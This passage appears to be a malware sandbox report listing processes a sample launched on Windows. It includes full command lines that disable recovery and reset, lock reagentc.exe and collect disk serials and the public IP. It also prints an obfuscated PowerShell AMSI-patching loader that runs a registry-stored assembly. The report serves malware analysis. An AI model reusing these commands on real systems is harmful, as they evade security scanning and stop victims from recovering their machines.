                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              Target ID:20
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:21
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
                                                              Imagebase:0x7ff751f60000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:22
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:23
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\powercfg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:powercfg /setactive SCHEME_CURRENT
                                                              Imagebase:0x7ff751f60000
                                                              File size:96'256 bytes
                                                              MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:24
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:25
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\SysWOW64\explorer.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\explorer.exe"
                                                              Imagebase:0xae0000
                                                              File size:4'514'184 bytes
                                                              MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:26
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C reagentc /disable
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:27
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:28
                                                              Start time:03:26:31
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:30
                                                              Start time:03:26:32
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\ReAgentc.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:reagentc /disable
                                                              Imagebase:0x7ff7d0300000
                                                              File size:44'544 bytes
                                                              MD5 hash:A109CC3B919C7D40E4114966340F39E5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:31
                                                              Start time:03:26:32
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+
'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$kpBUoTRvoOegOC=$MoLktxqtnxyrW.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+'r'+'o'+'c'+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EtevswwRQwRAejVCuvR=EtrMmUyKmezi @([String])([IntPtr]);$JKiOnBfFNlGvOZPRImquAA=EtrMmUyKmezi 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YdcUizEhLfa=$MoLktxqtnxyrW.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$scwfUeOSfALItM=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$YdcUizEhLfa,[Object](''+'L'+''+'o'+''+[Char](97)+''+'d'+''+'L'+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$OBgtMEtNHoxgskRxX=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$YdcUizEhLfa,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$CdwwlVp=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($scwfUeOSfALItM,$EtevswwRQwRAejVCuvR).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+''+'.'+''+[Char](100)+''+[Char](108)+'l');$TXsAOQOMQALSJtBsu=$kpBUoTRvoOegOC.Invoke($Null,@([Object]$CdwwlVp,[Object](''+[Char](65)+'ms'+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+'f'+[Char](101)+''+[Char](114)+'')));$TBhmHaliuf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OBgtMEtNHoxgskRxX,$JKiOnBfFNlGvOZPRImquAA).Invoke($TXsAOQOMQALSJtBsu,[uint32]8,4,[ref]$TBhmHaliuf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$TXsAOQOMQALSJtBsu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OBgtMEtNHoxgskRxX,$JKiOnBfFNlGvOZPRImquAA).Invoke($TXsAOQOMQALSJtBsu,[uint32]8,0x20,[ref]$TBhmHaliuf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+'L'+''+'M'+''+[Char](88)+''+[Char](115)+''+'t'+''+'a'+''+[Char](103
)+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                                                              Imagebase:0x7ff741d30000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:33
                                                              Start time:03:26:33
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:34
                                                              Start time:03:26:33
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:35
                                                              Start time:03:26:33
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:36
                                                              Start time:03:26:33
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\reg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
                                                              Imagebase:0x7ff67ae10000
                                                              File size:77'312 bytes
                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:38
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe"
                                                              Imagebase:0x7ff6f0210000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 53%, ReversingLabs
                                                              Has exited:true

                                                              Target ID:39
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:40
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:41
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\reg.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
                                                              Imagebase:0x7ff67ae10000
                                                              File size:77'312 bytes
                                                              MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:42
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C takeown /f C:\Windows\System32\reagentc.exe
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:43
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:44
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\takeown.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:takeown /f C:\Windows\System32\reagentc.exe
                                                              Imagebase:0x7ff7cfff0000
                                                              File size:66'560 bytes
                                                              MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:45
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C icacls C:\Windows\System32\reagentc.exe /grant administrators:F
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:46
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:47
                                                              Start time:05:14:47
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\icacls.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:icacls C:\Windows\System32\reagentc.exe /grant administrators:F
                                                              Imagebase:0x7ff73fdf0000
                                                              File size:39'424 bytes
                                                              MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:48
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\cmd.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:cmd.exe /C icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
                                                              Imagebase:0x7ff63cb60000
                                                              File size:289'792 bytes
                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:49
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:50
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\icacls.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
                                                              Imagebase:0x7ff73fdf0000
                                                              File size:39'424 bytes
                                                              MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:51
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:wmic diskdrive get serialnumber
                                                              Imagebase:0x7ff7e30d0000
                                                              File size:576'000 bytes
                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:52
                                                              Start time:05:14:48
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:53
                                                              Start time:05:14:50
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\dllhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9}
                                                              Imagebase:0x7ff7d8730000
                                                              File size:21'312 bytes
                                                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:54
                                                              Start time:05:14:50
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\winlogon.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:winlogon.exe
                                                              Imagebase:0x7ff6fc1b0000
                                                              File size:906'240 bytes
                                                              MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:55
                                                              Start time:05:14:51
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:wmic diskdrive get serialnumber
                                                              Imagebase:0x7ff7e30d0000
                                                              File size:576'000 bytes
                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:56
                                                              Start time:05:14:51
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:57
                                                              Start time:05:14:51
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\lsass.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\lsass.exe
                                                              Imagebase:0x7ff6d9390000
                                                              File size:59'456 bytes
                                                              MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:58
                                                              Start time:05:14:52
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\svchost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                              Imagebase:0x7ff7b4ee0000
                                                              File size:55'320 bytes
                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:59
                                                              Start time:05:14:53
                                                              Start date:12/01/2025
                                                              Path:C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe"
                                                              Imagebase:0x7ff7d1630000
                                                              File size:538'624 bytes
                                                              MD5 hash:BE89D598CD96443479C02B022FF70532
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:60
                                                              Start time:05:14:53
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\curl.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:curl -s https://api.ipify.org
                                                              Imagebase:0x7ff60a790000
                                                              File size:530'944 bytes
                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Target ID:61
                                                              Start time:05:14:53
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\dwm.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"dwm.exe"
                                                              Imagebase:0x7ff74b010000
                                                              File size:94'720 bytes
                                                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Target ID:62
                                                              Start time:05:14:53
                                                              Start date:12/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff75da10000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true


                                                                Execution Graph

                                                                Execution Coverage:0.8%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:3.7%
                                                                Total number of Nodes:1390
                                                                Total number of Limit Nodes:2
